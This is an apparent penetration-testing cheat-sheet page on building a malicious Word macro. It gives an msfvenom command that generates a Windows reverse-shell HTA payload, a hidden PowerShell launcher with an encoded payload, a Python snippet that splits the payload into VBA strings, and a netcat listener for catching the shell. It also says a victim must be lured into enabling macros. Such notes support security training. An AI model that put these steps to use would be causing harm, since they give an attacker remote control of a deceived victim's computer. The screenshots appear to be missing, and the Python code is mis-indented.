MSOffice macro attack
Kinda of an outdated technique, better options available using metasploit / cobaltstrike
Using Macros for attacks, Open word --→ View --→ Macros

Create a new macro



We must save the containing document as either .docm or the older .doc format, which supports embedded macros, but must avoid the .docx format, which does not support them.

Save on Desktop

Click on EvilMacro and enable content to trigger the script

Macro triggers cmd.exe

#Using Powershell and a Base64 encoded payload to get a reverse shell
sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.177 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta

Edit the EvilMacro

Since VBA as a limit on the length of strings we have to split the command into chunks before running the exploit.
#Python3 script
str = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZQB3AC....."
n = 50
for i in range(0, len(str), n):
print "Str = Str + " + '"' + str[i:i+n] + '"'


#Insert the macro


Start a nc listener on port 4444
nc -nvlp 4444
You have to save the document as Word 1997-2003 Version as further versions are not vulnerable
Open the file and enable macros
In an engagement scenario the victim has to be enticed to click on it and enable macros(unlikely)

Catch the revshell

Last updated